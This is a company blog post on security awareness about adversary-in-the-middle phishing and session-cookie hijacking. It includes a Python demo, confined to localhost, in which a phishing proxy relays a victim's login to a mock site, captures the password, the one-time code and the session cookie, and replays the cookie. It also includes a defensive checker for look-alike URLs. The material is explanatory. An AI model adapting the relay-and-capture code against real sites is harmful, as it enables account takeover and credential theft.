
You’re delusional if you still think you’re safe online

Here at CIBIS we pride ourselves on digital security awareness – it’s at the forefront of everything we do, as evidenced by our ISO 27001 certification. Hackers and online scams keep getting more sophisticated, and now they have AI to do much of the work for them. Even the most security-conscious people can still be caught out.

We recently fell victim to a case of cookie hijacking via a malicious website link. Cookies are small pieces of data stored by your browser. When you log in to a web site, the site sets a session cookie, and your browser sends it back with every later request as proof that you have already authenticated, so you can keep using the site until the cookie expires without logging in again. That is convenient, but it comes at a cost: for as long as it is valid, the cookie is worth as much as your password and your MFA code together. Modern web browsers do a good job of keeping cookies out of reach of other sites and of scripts (the HttpOnly and Secure cookie attributes exist for exactly this), but there are always unscrupulous individuals looking for ways around browser security, and whoever holds a valid session cookie effectively has the same access to the system that you have.

There are several ways for hackers to hijack cookies, but the most common one today is an Adversary in the Middle (AITM) phishing attack. You receive a website link that looks legitimate and, when you click it, you appear to be logging into the real site. It looks like the real site because it IS the real site: the scam site sits between you and it and passes on (proxies) every request and response in both directions. That lets the attacker capture your entire interaction with the legitimate site, including the session cookie it sets once you have logged in. Once a hacker has that cookie, they can use the site (or multiple sites that the same login covers) as if they were you. A long, complex password or ordinary multifactor authentication does not stop this, because you type the password and approve the MFA prompt yourself, the proxy relays both to the real site, and the cookie that comes back after the successful login is what the attacker keeps. The one form of MFA that does resist it is phishing-resistant MFA such as FIDO2 security keys or passkeys, which are bound to the real site’s domain and will not answer a challenge relayed through a look-alike address.
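To make the proxying concrete, here is an added example written for this article (not code from CIBIS, and not any attacker’s toolkit) that runs the whole exchange on localhost in Python: a stand-in for the real site that checks a password and a one-time code and then issues a session cookie, a stand-in for the scam site that forwards every request to it and relays the reply untouched, and a victim who logs in through the scam site. The account name, password, one-time code and the two server addresses are all constructed for the demo.

```python
"""Simulated adversary-in-the-middle (AITM) login flow, entirely on localhost (added example)."""
import http.client
import http.cookies
import http.server
import secrets
import threading
import urllib.parse

# Constructed demo account: the "real" site knows the password and the one-time
# code that its MFA step currently accepts.
DEMO_USERS = {"alice": {"password": "correct horse battery", "otp": "246810"}}
SESSIONS = {}   # session id -> user, held by the legitimate site
CAPTURED = []   # everything the scam site sees go past


class LegitimateSite(http.server.BaseHTTPRequestHandler):
    """The real site: verifies password + OTP, then issues a session cookie."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())

        def field(name):
            return form.get(name, [""])[0]

        account = DEMO_USERS.get(field("user"))
        if self.path == "/login" and account and \
                (field("password"), field("otp")) == (account["password"], account["otp"]):
            sid = secrets.token_hex(16)
            SESSIONS[sid] = field("user")
            self.send_response(302)
            # A real site would add "; Secure"; omitted only because this demo runs over plain HTTP.
            self.send_header("Set-Cookie", f"session={sid}; Path=/; HttpOnly; SameSite=Lax")
            self.send_header("Location", "/account")
        else:
            self.send_response(401)
        self.end_headers()

    def do_GET(self):
        jar = http.cookies.SimpleCookie(self.headers.get("Cookie", ""))
        user = SESSIONS.get(jar["session"].value) if "session" in jar else None
        if self.path == "/account" and user:
            body = f"account page for {user}".encode()
            self.send_response(200)
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
        else:
            self.send_response(401)
            self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass


class PhishingProxy(http.server.BaseHTTPRequestHandler):
    """The scam site: forwards each request to the real site and relays the answer
    unchanged, so the victim sees the genuine login flow, MFA prompt included."""
    upstream = ("127.0.0.1", 0)   # filled in by run_demo()

    def relay(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length) if length else None
        forwarded = {k: v for k, v in self.headers.items() if k.lower() in ("content-type", "cookie")}
        conn = http.client.HTTPConnection(*self.upstream)
        conn.request(self.command, self.path, body=body, headers=forwarded)
        resp = conn.getresponse()
        data = resp.read()
        # The attacker's take: the submitted credentials and OTP, and the session cookie.
        if body:
            CAPTURED.append(("form", body.decode()))
        for name, value in resp.getheaders():
            if name.lower() == "set-cookie":
                CAPTURED.append(("cookie", value))
        self.send_response(resp.status)
        for name, value in resp.getheaders():
            if name.lower() not in ("server", "date", "content-length"):
                self.send_header(name, value)
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    do_GET = do_POST = relay

    def log_message(self, *args):
        pass


def _serve(handler):
    server = http.server.ThreadingHTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server.server_address


def run_demo():
    """Victim logs in through the proxy with password AND OTP; attacker replays the cookie."""
    real = _serve(LegitimateSite)
    PhishingProxy.upstream = real
    fake = _serve(PhishingProxy)

    # 1. The victim, believing the scam address is the real site, submits everything MFA asks for.
    form = urllib.parse.urlencode({"user": "alice", "password": "correct horse battery", "otp": "246810"})
    conn = http.client.HTTPConnection(*fake)
    conn.request("POST", "/login", body=form, headers={"Content-Type": "application/x-www-form-urlencoded"})
    victim_resp = conn.getresponse()
    victim_resp.read()

    # 2. The attacker takes the relayed session cookie straight to the real site.
    stolen = next(v for kind, v in CAPTURED if kind == "cookie").split(";", 1)[0]
    conn = http.client.HTTPConnection(*real)
    conn.request("GET", "/account", headers={"Cookie": stolen})
    attacker_resp = conn.getresponse()
    return {
        "victim_login_status": victim_resp.status,   # 302: the login looked perfectly normal
        "captured": list(CAPTURED),
        "attacker_status": attacker_resp.status,     # 200: no password, no OTP needed
        "attacker_body": attacker_resp.read().decode(),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

Run it and the last two lines show the attacker fetching /account from the real site with the relayed cookie and getting a 200, never having needed the password or the one-time code. Note what the proxy did not have to do: it never broke TLS or the browser’s cookie protections. In a real attack the victim’s browser deliberately connects to the attacker’s domain, which holds a perfectly valid certificate for that domain, and the proxy opens its own connection to the real site; that is why the checks that follow focus on the address you are visiting rather than on the login form itself.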

So how do you prevent this from happening? There is no product that does it for you. Whilst there are products that will check the links you click, they may not be updated quickly enough, and hackers can stand up new sites in minutes. Vigilance is therefore the main defence. Whenever you click a web link, either in a web browser or in an e-mail message, there are three things you can do to check the legitimacy of the link:

  1. Check the URL – you’ll often find that scammers try to trick you by using something similar, e.g. instead of microsoft.com they’ll use microsoft-online.com or micrsoft.com. If you’re doubtful, don’t click it.
  2. If you do click the URL, check the site’s certificate (the padlock in the address bar). If it doesn’t have a certificate, or the browser warns about it, leave the site immediately. Bear in mind that a valid certificate only proves you are talking to the domain shown in the address bar, not that the domain is the one you meant: scam sites obtain perfectly valid certificates for their own look-alike domains. Some certificates also carry the name of the company they were issued to (although this is not required), and that name should match the company you expect.
  3. Use Google or another search engine to find the company and check that the domain in the search result matches the one you are accessing. Search engines are reasonably good at removing scam sites from their results, although not instantly.
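
Check 1 can be partly automated. The following is an added example, not a CIBIS tool, that applies the address checks above to a link before you open it, and goes a little beyond them: it insists on https, flags a bare IP address, a user@ prefix in front of the real host, and punycode labels (look-alike characters), and compares the host against a short allowlist of domains you expect to log in to, reporting hosts that are one or two typing errors away from a known domain or that contain a known brand inside some other domain. The allowlist and the sample links are constructed; the registrable-domain helper just takes the last two labels, a simplification that ignores public suffixes such as .co.uk.

```python
"""Address checks for a link before you open it (added example)."""
import ipaddress
import urllib.parse

# Constructed allowlist: the sign-in domains this reader actually expects to use.
KNOWN_DOMAINS = {"microsoft.com", "login.microsoftonline.com"}


def levenshtein(a, b):
    """Edit distance: how many single-character changes turn a into b."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable(host):
    """Last two labels of a host name. Simplification: ignores public suffixes such as .co.uk."""
    return ".".join(host.split(".")[-2:])


def check_url(url, known=KNOWN_DOMAINS):
    """Return the host the browser would really connect to, a verdict, and the reasons for it."""
    parts = urllib.parse.urlsplit(url)
    host = (parts.hostname or "").lower().rstrip(".")
    findings = []
    if parts.scheme != "https":
        findings.append("not https")
    if parts.username is not None:
        findings.append(f"'{parts.username}@' in front of the real host {host}")
    if "xn--" in host:
        findings.append("punycode label: letters may only look like the ones you expect")
    try:
        ipaddress.ip_address(host)
        findings.append("bare IP address instead of a name")
    except ValueError:
        pass
    if not host:
        return {"host": host, "verdict": "reject", "findings": findings + ["no host name"]}

    if host in known or any(host.endswith("." + k) for k in known):
        verdict = "known" if not findings else "suspicious"
    else:
        for k in sorted(known):
            reg = registrable(k)
            brand = reg.split(".")[0]
            if levenshtein(registrable(host), reg) <= 2:
                findings.append(f"one or two characters away from {reg}")
                break
            if brand in host:
                findings.append(f"contains '{brand}' but is not {reg}")
                break
        verdict = "suspicious" if findings else "unknown"
    return {"host": host, "verdict": verdict, "findings": findings}


if __name__ == "__main__":
    # Constructed sample links, including the two look-alikes mentioned in the text.
    for link in [
        "https://login.microsoftonline.com/",
        "https://microsoft-online.com/login",
        "https://micrsoft.com/login",
        "https://microsoft.com.example.net/login",
        "https://microsoft.com@example.net/",
        "http://microsoft.com/",
    ]:
        r = check_url(link)
        print(f"{r['verdict']:10} {r['host']:28} {'; '.join(r['findings'])}")
```

The two verdicts worth acting on are "suspicious" (don’t enter credentials) and "unknown" (fall back to check 3 and confirm the domain through a search engine before logging in). Note that microsoft-online.com is reported as one character away from the genuine microsoftonline.com, which is exactly the kind of near miss the eye glides over.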

None of these checks is foolproof, however, so vigilance remains the only real antidote to these scams. The internet has become such a ubiquitous part of our daily lives that it’s easy to fall victim to one of them, especially when the link seems to come from someone you trust. So stay alert and aware when you’re online – especially when it comes to entering your user name and password.
